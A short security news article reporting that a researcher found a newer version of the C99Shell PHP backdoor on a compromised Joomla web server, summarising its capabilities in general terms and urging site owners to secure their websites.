The C99Shell PHP backdoor, originally spotted in 2007, is still around, and is still a danger to both web server operators and end-users.
After getting a tip from a designer about a hacked Joomla page, Panda Security malware researcher Bart Blaze discovered that a newer version (2.1) of this scripted web application Trojan has been used to compromise a web server.
The same server has been infected with other PHP backdoors, one of which seems designed to specifically target mobile users.
But C99Shell is more than enough for attackers to take control of the server. The malware allows them to download/upload files from and to the server (via FTP), have full access to files on the hard disk, run shell commands, access and modify databases, and so on.
“In short, it can pretty much do everything you want, which results in end-users getting malware onto their systems and/or data getting stolen and/or personal information compromised,” says Blaze.
Another bad news is that AV detection for this variant is still relatively low.
“Securing your website is not only beneficial for you, but also for your customers and other visitors,” the researcher pointed out, and offered advice and links to resources on how to prevent this type of compromise.